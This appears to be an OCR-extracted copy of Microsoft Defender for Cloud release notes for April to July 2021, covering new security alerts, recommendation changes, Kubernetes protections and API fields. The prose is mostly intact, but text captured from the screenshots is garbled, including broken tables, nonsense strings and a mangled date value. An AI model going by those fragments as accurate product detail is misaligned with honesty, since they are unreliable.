Learn more about these options in Prevent misconfigurations with Enforce/Deny recommendations. 


CSV exports of recommendation data now limited to 20 MB 


We're instituting a limit of 20 MB when exporting Security Center recommendations data. 


v= Microsoft Defender for Cloud | Recommendations 


Ki 
v s 
Showing 2 subscriptions 


| P Search (Ctri+/) | + Download CSV report Q Guides & Feedback 


General 


. All recommendations Secure score recommendations 
Ọ Overview nn 


@ Getting started Use these recommendations to harden your resources. Each one 


¥ 2 For the full details of a recommendation, select it from the list. 
y= Recommendations 


DU Security alerts 


If you need to export larger amounts of data, use the available filters before selecting, or select subsets 


of your subscriptions and download the data in batches. 
Directory + subscription x 


Default subscription filter 


The portal will show data only for these selected 
subscriptions on portal launch. 


Current + delegated directories @ 


| Microsoft (microsoft.onmicrosoft.com) Vv | 
Subscription 
d resources. Learn more > — 
| All subscriptions AN | 


cur | Filter items... | 


= EZ 


Learn more about performing a CSV export of your security recommendations. 


Recommendations page now includes multiple views 


The recommendations page now has two tabs to provide alternate ways to view the recommendations 


relevant to your resources: 


e Secure score recommendations - Use this tab to view the list of recommendations grouped by 
security control. Learn more about these controls in Security controls and their recommendations. 

e All recommendations - Use this tab to view the list of recommendations as a flat list. This tab is 
also great for understanding which initiative (including regulatory compliance standards) 
generated the recommendation. Learn more about initiatives and their relationship to 


recommendations in What are security policies, initiatives, and recommendations?. 


Microsoft Defender for Cloud | Recommendations 


v — 

ea 

= Showing 54 subscriptions 

| Ø Search (Ctrl+/) | « d Download CSV report Q? Guides & Feedback 

General Secure score recommendations AI recommendations 
Ọ Overview 


@ Getting started 


e 


% 
y= Recommendations 5 3 o I Secure 53% (31 points) Not secure 47% (27 points) 


Ọ Security alerts 


July 2021 


Updates in July include: 


e Azure Sentinel connector now includes optional bi-directional alert synchronization (in preview) 

e Logical reorganization of Azure Defender for Resource Manager alerts 

e Enhancements to recommendation to enable Azure Disk Encryption (ADE) 

e Continuous export of secure score and regulatory compliance data released for general 
availability (GA) 

e Workflow automations can be triggered by changes to regulatory compliance assessments (GA) 

e Assessments API field 'FirstEvaluationDate' and 'StatusChangeDate' now available in workspace 
schemas and logic apps 


e ‘Compliance over time’ workbook template added to Azure Monitor Workbooks gallery 


Azure Sentinel connector now includes optional bi-directional alert 
synchronization (in preview) 


Security Center natively integrates with Azure Sentinel, Azure's cloud-native SIEM and SOAR solution. 


Azure Sentinel includes built-in connectors for Azure Security Center at the subscription and tenant 
levels. Learn more in Stream alerts to Azure Sentinel. 


When you connect Azure Defender to Azure Sentinel, the status of Azure Defender alerts that get 
ingested into Azure Sentinel is synchronized between the two services. So, for example, when an alert 
is closed in Azure Defender, that alert will display as closed in Azure Sentinel as well. Changing the 
status of an alert in Azure Defender "won't"* affect the status of any Azure Sentinel incidents that 
contain the synchronized Azure Sentinel alert, only that of the synchronized alert itself. 


Enabling this preview feature, bi-directional alert synchronization, will automatically sync the status of 
the original Azure Defender alerts with Azure Sentinel incidents that contain the copies of those Azure 
Defender alerts. So, for example, when an Azure Sentinel incident containing an Azure Defender alert is 
closed, Azure Defender will automatically close the corresponding original alert. 


Learn more in Connect Azure Defender alerts from Azure Security Center. 


Logical reorganization of Azure Defender for Resource Manager 
alerts 


The alerts listed below were provided as part of the Azure Defender for Resource Manager plan. 


As part of a logical reorganization of some of the Azure Defender plans, we've moved some alerts from 
Azure Defender for Resource Manager to Azure Defender for Servers. 


The alerts are organized according to two main principles: 


e Alerts that provide control-plane protection - across many Azure resource types - are part of 
Azure Defender for Resource Manager 

e Alerts that protect specific workloads are in the Azure Defender plan that relates to the 
corresponding workload 


These are the alerts that were part of Azure Defender for Resource Manager, and which, as a result of 
this change, are now part of Azure Defender for Servers: 


e ARM_AmBroadFilesExclusion 

e ARM_AmDisablementAndCodeExecution 

e ARM_AmDisablement 

e ARM_AmFileExclusionAndCodeExecution 

e ARM_AmTempFileExclusionAndCodeExecution 

e ARM_AmTempFileExclusion 

e ARM_AmRealtimeProtectionDisabled 

e ARM_AmTempRealtimeProtectionDisablement 

e ARM_AmRealtimeProtectionDisablementAndCodeExec 
e ARM_AmMalwareCampaignRelatedExclusion 

e ARM_AmTemporarilyDisablement 

e ARM_UnusualAmFileExclusion 

e ARM_CustomScriptExtensionSuspiciousCmd 

e ARM_CustomScriptExtensionSuspiciousEntryPoint 
e ARM_CustomScriptExtensionSuspiciousPayload 
e ARM_CustomScriptExtensionSuspiciousFailure 

e ARM_CustomScriptExtensionUnusualDeletion 

e ARM_CustomScriptExtensionUnusualExecution 


e ARM_VMAccessUnusualConfigReset 
e ARM _VMAccessUnusualPasswordReset 
e ARM_VMAccessUnusualSSHReset 


Learn more about the Azure Defender for Resource Manager and Azure Defender for Servers plans. 


Enhancements to recommendation to enable Azure Disk 
Encryption (ADE) 


Following user feedback, we've renamed the recommendation Disk encryption should be applied on 


virtual machines. 


The new recommendation uses the same assessment ID and is called Virtual machines should encrypt 


temp disks, caches, and data flows between Compute and Storage resources. 


The description has also been updated to better explain the purpose of this hardening 


recommendation: 


Recommendation Description Severity 
Virtual machines should encrypt By default, a virtual machine's OS and data disks are encrypted-at- High 
temp disks, caches, and data rest using platform-managed keys; temp disks and data caches 

flows between Compute and aren't encrypted, and data isn't encrypted when flowing between 

Storage resources compute and storage resources. For more information, see the 


comparison of different disk encryption technologies in Azure”. 
Use Azure Disk Encryption to encrypt all this data. Disregard this 
recommendation if: (1) you're using the encryption-at-host feature, 
or (2) server-side encryption on Managed Disks meets your 
security requirements. Learn more in Server-side encryption of 
Azure Disk Storage. 


Continuous export of secure score and regulatory compliance data 
released for general availability (GA) 


Continuous export provides the mechanism for exporting your security alerts and recommendations 
for tracking with other monitoring tools in your environment. 


When you set up your continuous export, you configure what is exported, and where it will go. Learn 


more in the overview of continuous export. 
We've enhanced and expanded this feature over time: 


e In November 2020, we added the preview option to stream changes to your secure score. 


For full details, see Secure score is now available in continuous export (preview). 


e In December 2020, we added the preview option to stream changes to your regulatory 
compliance assessment data. 
For full details, see Continuous export gets new data types (preview). 


With this update, these two options are released for general availability (GA). 


Workflow automations can be triggered by changes to regulatory 
compliance assessments (GA) 


In February 2021, we added a preview third data type to the trigger options for your workflow 
automations: changes to regulatory compliance assessments. Learn more in Workflow automations can 


be triggered by changes to regulatory compliance assessments. 
With this update, this trigger option is released for general availability (GA). 


Learn how to use the workflow automation tools in Automate responses to Security Center triggers. 


Dashboard > Microsoft Defender for Cloud > Settings Add workflow automation xX 
g Settings | Workflow automation Eee 
© Showing 63 subscriptions N ‘* 
lame 
[e Search (Ctrl+/) | «< ©) Refresh 
Settings 
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= Filter by name | P Se... En... 
©) Microsoft Defender for Cloud - 
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© Integrations ZA testSecureScoreCont-. DO Enabled ASC DEMO Resource group * © 
ZA Workflow automation SE 


E Continuous export 


Trigger conditions © 
Choose the trigger conditions that will automatically trigger the configured action. 


Defender for Cloud data type * 


[ Regulatory compliance standards 


Compliance standard * 


Azure-Security-Benchmark 


Compliance control state * 


Passed, Failed 


Select all 


Failed 


Passed 


Skipped 


Unsupported 


= 


Assessments API field 'FirstEvaluationDate' and 'StatusChangeDate' 
now available in workspace schemas and logic apps 


In May 2021, we updated the Assessment API with two new fields, FirstEvaluationDate and 


StatusChangeDate. For full details, see Assessments API expanded with two new fields. 


Those fields were accessible through the REST API, Azure Resource Graph, continuous export, and in 
CSV exports. 


With this change, we're making the information available in the Log Analytics workspace schema and 
from logic apps. 


‘Compliance over time’ workbook template added to Azure 
Monitor Workbooks gallery 


In March, we announced the integrated Azure Monitor Workbooks experience in Security Center (see 
Azure Monitor Workbooks integrated into Security Center and three templates provided). 


The initial release included three templates to build dynamic and visual reports about your 


organization's security posture. 


We've now added a workbook dedicated to tracking a subscription's compliance with the regulatory or 


industry standards applied to it. 


Learn about using these reports or building your own in Create rich, interactive reports of Security 
Center data. 


Microsoft Defender for Cloud | Workbooks | Compliance Over Time x 
Showing subscription 'CyberSecSOC" 


@ workbooks Edit O A 2 © ? Hep D Auto refresh: off 


9 Regulatory compliance overview JAI Regulatory compliance passsed controls over time (weekly) 


100% F E 
Compliance regulatory standards Passed controls Ty Passed —— B GCP-CIS-1.... 
L AWS-Foun... 

SOC-TSP 1/13 7.69% B Aws-Pci-b... 

= = 8086 | ee = 

AWS-CIS-1.... 

ISO-27001 2/20 10% 

B = H Azure-Secu... 
PCI-DSS-3.2.1 6/43 1 60% Wi Pci-Dss-3.... 

e L DSa 
Azure-Security-Benchmark 12/40 30% Eee Pza 

N OOO EE E SOC-TSP 

AWS-CIS-1.2.0 17/43 39.5% 

— SS er 
AWS-PCI-DSS-3.2.1 18/40 45% B 

be — 20% 
AWS-Foundational-Security-Best-Practices 58/77 75.3% 

ee 
GCP-CIS-1.1.0 45/46 97.8% dei 

—— n Apr 11 Apr 18 Apr25 May 2 May 9 May 16May 23May 30 Jun 6 


| GCP-CIS-1.10 (Last) | AWS-Foundational-Securi_.. | AWS-PG-DSS-321 (Last) 


97.83% 181.82« 147.5. 


Changes for ‘Azure-Security-Benchmark’ 


Main Control Passed controls Ty Passed Controls % Ty “daz change T4  30-days change ty 


BR - Backup and Recovery 6 0% 0% 


NS - Network Security 


S g 


PV - Posture and Vulnerability Management 


3 


DP - Data Protection 


a 
b 


IM - Identity Management 


PA - Privileged Access 


3 


LT - Logging and Threat Detection 


g 


AM - Asset Management 


IR - Incident Response 


2 
222 28828288 


= ES 
| j 
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June 2021 


Updates in June include: 


e New alert for Azure Defender for Key Vault 
e Recommendations to encrypt with customer-managed keys (CMKs) disabled by default 
e Prefix for Kubernetes alerts changed from "AKS_" to "K8S_" 


e Deprecated two recommendations from "Apply system updates" security control 


New alert for Azure Defender for Key Vault 


To expand the threat protections provided by Azure Defender for Key Vault, we've added the following 


alert: 
Alert (alert type) Description MITRE Severity 
tactic 
Access from a suspicious IP. A key vault has been successfully accessed by an IP that Credential Medium 
address to a key vault has been identified by Microsoft Threat Intelligence as a Access 
(KV_SuspiciousIPAccess) suspicious IP address. This may indicate that your 


infrastructure has been compromised. We recommend 
further investigation. Learn more about Microsoft's threat 
intelligence capabilities £. 


For more information, see: 


e Introduction to Azure Defender for Key Vault 
e Respond to Azure Defender for Key Vault alerts 
e List of alerts provided by Azure Defender for Key Vault 


Recommendations to encrypt with customer-managed keys (CMKs) 
disabled by default 


Security Center includes multiple recommendations to encrypt data at rest with customer-managed 
keys, such as: 


e Container registries should be encrypted with a customer-managed key (CMK) 
e Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest 


e Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK) 


Data in Azure is encrypted automatically using platform-managed keys, so the use of customer- 
managed keys should only be applied when required for compliance with a specific policy your 


organization is choosing to enforce. 


With this change, the recommendations to use CMKs are now disabled by default. When relevant for 
your organization, you can enable them by changing the Fffect parameter for the corresponding 
security policy to AuditlIfNotExists or Enforce. Learn more in Enable a security recommendation. 


This change is reflected in the names of the recommendation with a new prefix, [Enable if required], as 


shown in the following examples: 


e [Enable if required] Storage accounts should use customer-managed key to encrypt data at rest 
e [Enable if required] Container registries should be encrypted with a customer-managed key 
(CMK) 


e [Enable if required] Azure Cosmos DB accounts should use customer-managed keys to encrypt 
data at rest 


| 2 cmk Recommendation status : 2 Selected Recommendation maturity : All Severity : All Resource type : All 
Initiative ; All Response actions : All Contains exemptions : All Environment : All 
Recommendation T4 Unhealthy resources T4 Resource health Ty Initiative 
D [Enable if required}|Storage accounts should use customer-managed key (CMK) for encryption DS _ 371 of 373 storage accounts B ASB, Azure CIS 1.3.06 
A [Enable if required}|Container registries should be encrypted with a customer-managed key (CMK) @ 13 of 15 container registries MEMMEN ASB, — | 
A Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK) | 2 of 2 azure resources Sa ASB KO 


Prefix for Kubernetes alerts changed from "AKS_" to "K8S_" 


Azure Defender for Kubernetes recently expanded to protect Kubernetes clusters hosted on-premises 
and in multicloud environments. Learn more in Use Azure Defender for Kubernetes to protect hybrid 
and multicloud Kubernetes deployments (in preview). 


To reflect the fact that the security alerts provided by Azure Defender for Kubernetes are no longer 
restricted to clusters on Azure Kubernetes Service, we've changed the prefix for the alert types from 
"AKS_" to "K8S_". Where necessary, the names and descriptions were updated too. For example, this 
alert: 


Alert (alert type) Description 


Kubernetes penetration testing tool Kubernetes audit log analysis detected usage of Kubernetes penetration 
detected testing tool in the AKS cluster. While this behavior can be legitimate, 
(AKS_PenTestToolsKubeHunter) attackers might use such public tools for malicious purposes. 


was changed to: 


Alert (alert type) Description 

Kubernetes penetration testing Kubernetes audit log analysis detected usage of Kubernetes penetration 
tool detected testing tool in the Kubernetes cluster. While this behavior can be legitimate, 
(K8S_PenTestToolsKubeHunter) attackers might use such public tools for malicious purposes. 


Any suppression rules that refer to alerts beginning "AKS_" were automatically converted. If you've 
setup SIEM exports, or custom automation scripts that refer to Kubernetes alerts by alert type, you'll 
need to update them with the new alert types. 


For a full list of the Kubernetes alerts, see Alerts for Kubernetes clusters. 


Deprecated two recommendations from "Apply system updates" 
security control 


The following two recommendations were deprecated: 


e OS version should be updated for your cloud service roles - By default, Azure periodically 
updates your guest OS to the latest supported image within the OS family that you've specified in 
your service configuration (.cscfg), such as Windows Server 2016. 

e Kubernetes Services should be upgraded to a non-vulnerable Kubernetes version - This 
recommendation's evaluations aren't as wide-ranging as we'd like them to be. We plan to replace 


the recommendation with an enhanced version that's better aligned with your security needs. 


May 2021 


Updates in May include: 


e Azure Defender for DNS and Azure Defender for Resource Manager released for general 
availability (GA) 

e Azure Defender for open-source relational databases released for general availability (GA) 

e New alerts for Azure Defender for Resource Manager 

e CI/CD vulnerability scanning of container images with GitHub workflows and Azure Defender 
(preview) 

e More Resource Graph queries available for some recommendations 

e SQL data classification recommendation severity changed 

e New recommendations to enable trusted launch capabilities (in preview) 

e New recommendations for hardening Kubernetes clusters (in preview) 

e Assessments API expanded with two new fields 

e Asset inventory gets a cloud environment filter 


Azure Defender for DNS and Azure Defender for Resource 
Manager released for general availability (GA) 


These two cloud-native breadth threat protection plans are now GA. 


These new protections greatly enhance your resiliency against attacks from threat actors, and 
significantly increase the number of Azure resources protected by Azure Defender. 


e Azure Defender for Resource Manager - automatically monitors all resource management 
operations performed in your organization. For more information, see: 
o Introduction to Azure Defender for Resource Manager 
o Respond to Azure Defender for Resource Manager alerts 


o List of alerts provided by Azure Defender for Resource Manager 


e Azure Defender for DNS - continuously monitors all DNS queries from your Azure resources. For 
more information, see: 
o Introduction to Azure Defender for DNS 
o Respond to Azure Defender for DNS alerts 
o List of alerts provided by Azure Defender for DNS 


To simplify the process of enabling these plans, use the recommendations: 
e Azure Defender for Resource Manager should be enabled 


e Azure Defender for DNS should be enabled 


© Note 


Enabling Azure Defender plans results in charges. Learn about the pricing details per region on 
Security Center's pricing page”. 


Azure Defender for open-source relational databases released for 
general availability (GA) 


Azure Security Center expands its offer for SQL protection with a new bundle to cover your open- 
source relational databases: 


e Azure Defender for Azure SQL database servers - defends your Azure-native SQL Servers 

e Azure Defender for SQL servers on machines - extends the same protections to your SQL servers 
in hybrid, multicloud, and on-premises environments 

e Azure Defender for open-source relational databases - defends your Azure Databases for 
MySQL, PostgreSQL, and MariaDB single servers 


Azure Defender for open-source relational databases constantly monitors your servers for security 
threats and detects anomalous database activities indicating potential threats to Azure Database for 
MySQL, PostgreSQL, and MariaDB. Some examples are: 


e Granular detection of brute force attacks - Azure Defender for open-source relational databases 
provides detailed information on attempted and successful brute force attacks. This lets you 
investigate and respond with a more complete understanding of the nature and status of the 
attack on your environment. 

e Behavioral alerts detection - Azure Defender for open-source relational databases alerts you to 
suspicious and unexpected behaviors on your servers, such as changes in the access pattern to 
your database. 

e Threat intelligence-based detection - Azure Defender applies Microsoft's threat intelligence and 
vast knowledge base to surface threat alerts so you can act against them. 


Learn more in Introduction to Azure Defender for open-source relational databases. 


New alerts for Azure Defender for Resource Manager 


To expand the threat protections provided by Azure Defender for Resource Manager, we've added the 
following alerts: 


Alert (alert type) Description MITRE Severity 
tactics 

Permissions granted for an RBAC role in Azure Defender for Resource Manager Lateral Medium 

an unusual way for your Azure detected an RBAC role assignment that's Movement, 

environment (Preview) unusual when compared with other Defense 

(ARM_AnomalousRBACRoleAssignment) assignments performed by the same Evasion 


assigner / performed for the same 
assignee / in your tenant due to the 
following anomalies: assignment time, 
assigner location, assigner, authentication 
method, assigned entities, client software 
used, assignment extent. This operation 
might have been performed by a 


Alert (alert type) Description MITRE Severity 
tactics 


legitimate user in your organization. 
Alternatively, it might indicate that an 
account in your organization was 
breached, and that the threat actor is 
trying to grant permissions to an 
additional user account they own. 


Privileged custom role created for your Azure Defender for Resource Manager Lateral Low 
subscription in a suspicious way (Preview) detected a suspicious creation of Movement, 
(ARM_PrivilegedRoleDefinitionCreation) privileged custom role definition in your Defense 

subscription. This operation might have Evasion 

been performed by a legitimate user in 

your organization. Alternatively, it might 

indicate that an account in your 

organization was breached, and that the 

threat actor is trying to create a privileged 

role to use in the future to evade 

detection. 


Azure Resource Manager operation from Azure Defender for Resource Manager Execution Medium 
suspicious IP address (Preview) detected an operation from an IP address 
(ARM_OperationFromSuspicious!P) that has been marked as suspicious in 

threat intelligence feeds. 


Azure Resource Manager operation from Azure Defender for Resource Manager Defense Medium 
suspicious proxy IP address (Preview) detected a resource management Evasion 
(ARM_OperationFromSuspiciousProxyIP) operation from an IP address that is 

associated with proxy services, such as 

TOR. While this behavior can be legitimate, 

it's often seen in malicious activities, when 

threat actors try to hide their source IP. 


For more information, see: 


e Introduction to Azure Defender for Resource Manager 
e Respond to Azure Defender for Resource Manager alerts 
e List of alerts provided by Azure Defender for Resource Manager 


CI/CD vulnerability scanning of container images with GitHub 
workflows and Azure Defender (preview) 


Azure Defender for container registries now provides DevSecOps teams observability into GitHub 
Actions workflows. 


The new vulnerability scanning feature for container images, utilizing Trivy, helps your developers scan 
for common vulnerabilities in their container images before pushing images to container registries. 


Container scan reports are summarized in Azure Security Center, providing security teams better 
insight and understanding about the source of vulnerable container images and the workflows and 
repositories from where they originate. 


Learn more in Identify vulnerable container images in your CI/CD workflows. 


More Resource Graph queries available for some recommendations 


All of Security Center's recommendations have the option to view the information about the status of 
affected resources using Azure Resource Graph from the Open query. For full details about this 


powerful feature, see Review recommendation data in Azure Resource Graph Explorer (ARG). 


Security Center includes built-in vulnerability scanners to scan your VMs, SQL servers and their hosts, 
and container registries for security vulnerabilities. The findings are returned as recommendations with 
all the individual findings for each resource type gathered into a single view. The recommendations 


are: 


Vulnerabilities in Azure Container Registry images should be remediated (powered by Qualys) 


Vulnerabilities in your virtual machines should be remediated 


SQL databases should have vulnerability findings resolved 


SQL servers on machines should have vulnerability findings resolved 


With this change, you can use the Open query button to also open the query showing the security 
findings. 


Vulnerabilities in Azure Container Registry images should be remediated (powered by Qualys) ~ x 


© Exempt © Disable rule G view policy definition KA Open query v 


Query returning affected resources 


Unhealthy registries Severity Vulnerabilities by severity Registries with most vulnerabilities 
4/4 | High Query returning security ITE High an ACRdemo egi 
M N ZA 
Medium 329 MEE ascdemo 339 
Low B) imageScanPrivatePreview 66 


A^ Description 


Container image vulnerability assessment scans your registry for security vulnerabilities and exposes detailed findings for each image. 


Resolving the vulnerabilities can greatly improve your containers’ security posture and protect them from attacks. 
w Remediation steps 
v Affected resources 
A Security Checks 


Findings Disabled findings 


Ø Search to filter items... | 


ID Security Check Category Applies To Severity Patch Available 
372268 GNU Bash Privilege Escalation Vulnerability for Debian Local 26 of 53 Scanned Images @ High No 
178369 Debian Security Update for tzdata (DLA 2424-1) Debian 11 of 53 Scanned Images @ High Yes 
176875 Debian Security Update for systemd Debian 11 of 53 Scanned Images @ High Yes 
178391 Debian Security Update Multiple Vulnerabilities for perl Debian 10 of 53 Scanned Images @ High Yes 
105812 EOL/Obsolete Software: Exim Message Transfer Agent (MTA) Prior to 4... Security Policy 7 of 53 Scanned Images @ High No 
176750 Debian Security Update for apache2 (DSA 4422-1) Debian 7 of 53 Scanned Images @ High Yes 
177442 Debian Security Update for file (DSA 4550-1) Debian 7 of 53 Scanned Images @ High Yes 
176853 Debian Security Update for libssh2 (DSA 4431-1) Debian 7 of 53 Scanned Images @ High Yes 


The Open query button offers additional options for some other recommendations where relevant. 
Learn more about Security Center's vulnerability scanners: 


e Azure Defender's integrated Qualys vulnerability scanner for Azure and hybrid machines 


e Azure Defender's integrated vulnerability assessment scanner for SQL servers 
e Azure Defender's integrated vulnerability assessment scanner for container registries 


SQL data classification recommendation severity changed 


The severity of the recommendation Sensitive data in your SQL databases should be classified has 


been changed from High to Low. 


This is part of an ongoing change to this recommendation announced in our upcoming changes page. 


New recommendations to enable trusted launch capabilities (in 
preview) 


Azure offers trusted launch as a seamless way to improve the security of generation 2 VMs. Trusted 
launch protects against advanced and persistent attack techniques. Trusted launch is composed of 
several, coordinated infrastructure technologies that can be enabled independently. Each technology 
provides another layer of defense against sophisticated threats. Learn more in Trusted launch for Azure 


virtual machines. 


© Important 


Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on 
existing virtual machines that were initially created without it. 


Trusted launch is currently in public preview. The preview is provided without a service level 
agreement, and it's not recommended for production workloads. Certain features might not be 


supported or might have constrained capabilities. 


Security Center's recommendation, vTPM should be enabled on supported virtual machines, ensures 
your Azure VMs are using a vTPM. This virtualized version of a hardware Trusted Platform Module 
enables attestation by measuring the entire boot chain of your VM (UEFI, OS, system, and drivers). 


With the vTPM enabled, the Guest Attestation extension can remotely validate the secure boot. The 


following recommendations ensure this extension is deployed: 


e Secure Boot should be enabled on supported Windows virtual machines 

e Guest Attestation extension should be installed on supported Windows virtual machines 

e Guest Attestation extension should be installed on supported Windows Virtual Machine Scale 
Sets 

e Guest Attestation extension should be installed on supported Linux virtual machines 

e Guest Attestation extension should be installed on supported Linux Virtual Machine Scale Sets 


Learn more in Trusted launch for Azure virtual machines. 


New recommendations for hardening Kubernetes clusters (in 
preview) 


The following recommendations allow you to further harden your Kubernetes clusters 


e Kubernetes clusters should not use the default namespace - To protect against unauthorized 
access for ConfigMap, Pod, Secret, Service, and ServiceAccount resource types, prevent usage of 
the default namespace in Kubernetes clusters. 

e Kubernetes clusters should disable automounting API credentials - To prevent a potentially 
compromised Pod resource from running API commands against Kubernetes clusters, disable 


automounting API credentials. 
e Kubernetes clusters should not grant CAPSYSADMIN security capabilities 


Learn how Security Center can protect your containerized environments in Container security in 


Security Center. 


Assessments API expanded with two new fields 
We've added the following two fields to the Assessments REST API: 


e FirstEvaluationDate — The time that the recommendation was created and first evaluated. 
Returned as UTC time in ISO 8601 format. 

e StatusChangeDate - The time that the status of the recommendation last changed. Returned as 
UTC time in ISO 8601 format. 


The initial default value for these fields - for all recommendations - is 2021-@3-14T00: 00 : 00+0000000Z . 


To access this information, you can use any of the methods in the table below. 


Tool Details 


REST API GET 
call https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Security/assessments? 


api-version=2019-01-01-preview&$expand=statusEvaluationDates 


Azure securityresources 
Resource where type == "microsoft.security/assessments" 
Graph 


Continuous The two dedicated fields will be available the Log Analytics workspace data 
export 


CSV export The two fields are included in the CSV files 


Learn more about the Assessments REST API. 


Asset inventory gets a cloud environment filter 


Security Center's asset inventory page offers many filters to quickly refine the list of resources 


displayed. Learn more in Explore and manage your resources with asset inventory. 


A new filter offers the option to refine the list according to the cloud accounts you've connected with 


Security Center's multicloud features: 


Ea Microsoft Defender for Cloud | Inventory = S 


Showing 57 subscriptions 


© Refresh -+ Add non-Azure servers E Open query 4 Assign tags d Download csv report {4} Trigger logic app © Learn more Q Guides & Feedback 


Filter by name Subscriptions == All Resource Groups == All X< Resource types == All > esiak EO Environment == All X 
Goud 


Recommendations == All X ty Add filter 


Environment 


Total Resources Unhealthy Resources Unmonitored F Filter | Environment v | 


ts 4185 EA 2669 Tb 40 per [== z] 


| Azure (3849) 


Value 


E emu Virtual machines F | ) E be 
= 2 
4 stv-jump Servers - Azure Arc E E 
Select all 
E contosowebbe2 Virtual machines F m) E 
E azure (2849) 
LJ 4 sqltoremidiate Servers - Azure Arc ASC DEMO 
lel aws (150) 
A m Servers - Azure Arc ASC DEMO dk 
L] ccr ass) 
d asc-va-demo-01 Servers - Azure Arc ASC DEMO A = 
go 4 vm3wl Servers - Azure Arc ASC DEMO © Unmonitored On = 
LJ 4 contosowebfe1 Servers - Azure Arc ASC DEMO © Unmonitored On = 
4 contosowebde Servers - Azure Arc ASC DEMO © unmonitored On SE 
E 10-dev Virtual machines ASC DEMO © unmonitored On KS coo i 


Learn more about the multicloud capabilities: 


e Connect your AWS accounts to Azure Security Center 


e Connect your GCP projects to Azure Security Center 


April 2021 


Updates in April include: 


e Refreshed resource health page (in preview) 

e Container registry images that have been recently pulled are now rescanned weekly (released for 
general availability (GA)) 

e Use Azure Defender for Kubernetes to protect hybrid and multicloud Kubernetes deployments (in 
preview) 

e Microsoft Defender for Endpoint integration with Azure Defender now supports Windows Server 
2019 and Windows 10 on Windows Virtual Desktop released for general availability (GA) 

e Recommendations to enable Azure Defender for DNS and Resource Manager (in preview) 

e Three regulatory compliance standards added: Azure CIS 1.3.0, CMMC Level 3, and New Zealand 
ISM Restricted 

e Four new recommendations related to guest configuration (in preview) 

e CMK recommendations moved to best practices security control 

e 11 Azure Defender alerts deprecated 

e Two recommendations from "Apply system updates" security control were deprecated 

e Azure Defender for SQL on machine tile removed from Azure Defender dashboard 


e 21 recommendations moved between security controls 


Refreshed resource health page (in preview) 


Security Center's resource health has been expanded, enhanced, and improved to provide a snapshot 
view of the overall health of a single resource. 


You can review detailed information about the resource and all recommendations that apply to that 
resource. Also, if you're using the advanced protection plans of Microsoft Defender, you can see 
outstanding security alerts for that specific resource too. 


To open the resource health page for a resource, select any resource from the asset inventory page. 
This preview page in Security Center's portal pages shows: 


1. Resource information - The resource group and subscription it's attached to, the geographic 
location, and more. 

2. Applied security feature - Whether Azure Defender is enabled for the resource. 

3. Counts of outstanding recommendations and alerts - The number of outstanding security 
recommendations and Azure Defender alerts. 

4. Actionable recommendations and alerts - Two tabs list the recommendations and alerts that 


apply to the resource. 


Dashboard Microsoft Defender for Cloud 
Resource health - x 
E deter Recommendations Alerts 
@ Monitored P Search Status == All X Severity == All X 
Monitoring 
Severity Description Status 


Resource information 
High All network ports should be restricted on network security groups associated to your virtual machine © Unhealthy 


Contoso Infra1 


High Adaptive network hardening recommendations should be applied on internet facing virtual machines © Unhealthy 


High Disk encryption should be applied on virtual machines © Unhealthy 


High System updates should be installed on your machines © Unhealthy 


High Management ports of virtual machines should be protected with just-in-time network access control © Unhealthy 


| 
Siaj Galea @ Medium Windows Defender Exploit Guard should be enabled on your machines Preview © Unhealthy 
Microsoft Defender for Serve Medium A vulnerability assessment solution should be enabled on your virtual machines © Unhealthy 
= Medium Management ports should be closed on your virtual machines © Unhealthy 
Low Vulnerabilities in security configuration on your machines should be remediated © Unhealthy 
Low Azure Backup should be enabled for virtual machines ` Preview © Unhealthy 
Low Dependency agent should be enabled for listed virtual machine images © Unhealthy 
Low Audit Windows machines that do not have a maximum password age of 70 days © Unhealthy 
Low Audit Windows machines that do not have a minimum password age of 1 day © Unhealthy 
Low Audit Windows machines that do not restrict the minimum password length to 14 characters © Unhealthy 
Low Audit Windows machines that allow re-use of the previous 24 passwords © Unhealthy 
Low Audit diagnostic setting © Unhealthy 
High Virtual machines should be migrated to new Azure Resource Manager resources © Healthy 
High Windows web servers should be configured to use secure communication protocols bete © Healthy 
High nternet-facing virtual machines should be protected with network security groups © Healthy 
Jui Log Analytics agent should be installed on your virtual machine © Healthy 
Page[i beida] Next> 


Learn more in Tutorial: Investigate the health of your resources. 


Container registry images that have been recently pulled are now 
rescanned weekly (released for general availability (GA)) 


Azure Defender for container registries includes a built-in vulnerability scanner. This scanner 
immediately scans any image you push to your registry and any image pulled within the last 30 days. 


New vulnerabilities are discovered every day. With this update, container images that were pulled from 
your registries during the last 30 days will be rescanned every week. This ensures that newly 
discovered vulnerabilities are identified in your images. 


Scanning is charged on a per image basis, so there's no additional charge for these rescans. 


Learn more about this scanner in Use Azure Defender for container registries to scan your images for 


vulnerabilities. 


Use Azure Defender for Kubernetes to protect hybrid and 
multicloud Kubernetes deployments (in preview) 


Azure Defender for Kubernetes is expanding its threat protection capabilities to defend your clusters 
wherever they're deployed. This has been enabled by integrating with Azure Arc-enabled Kubernetes 


and its new extensions capabilities. 


When you've enabled Azure Arc on your non-Azure Kubernetes clusters, a new recommendation from 
Azure Security Center offers to deploy the Azure Defender agent to them with only a few clicks. 


Use the recommendation (Azure Arc-enabled Kubernetes clusters should have Azure Defender's 
extension installed) and the extension to protect Kubernetes clusters deployed in other cloud 
providers, although not on their managed Kubernetes services. 


This integration between Azure Security Center, Azure Defender, and Azure Arc-enabled Kubernetes 


brings: 


e Easy provisioning of the Azure Defender agent to unprotected Azure Arc-enabled Kubernetes 
clusters (manually and at-scale) 

e Monitoring of the Azure Defender agent and its provisioning state from the Azure Arc Portal 

e Security recommendations from Security Center are reported in the new Security page of the 
Azure Arc Portal 

e Identified security threats from Azure Defender are reported in the new Security page of the 
Azure Arc Portal 

e Azure Arc-enabled Kubernetes clusters are integrated into the Azure Security Center platform and 


experience 


Learn more in Use Azure Defender for Kubernetes with your on-premises and multicloud Kubernetes 


clusters. 


Dashboard > Microsoft Defender for Cloud 
y= Microsoft Defender for Cloud | Recommendations ~ x 
NA E 


63 subscriptions 


| K d Download CSV report Q Guides & Feedback 


General 


Each security control below represents a security risk you should mitigate. 


D overview 
Address the recommendations in each control, focusing on the controls worth the most points. 
@ Getting started To get the max score, fix all recommendations for all resources in a control. Learn more > 
== Recommendations — e 
P defender for kubern Control status : 2 Selected Recommendation status : 2 Selected Recommendation Reset Group by controls: 
O Security alerts filters @ o 
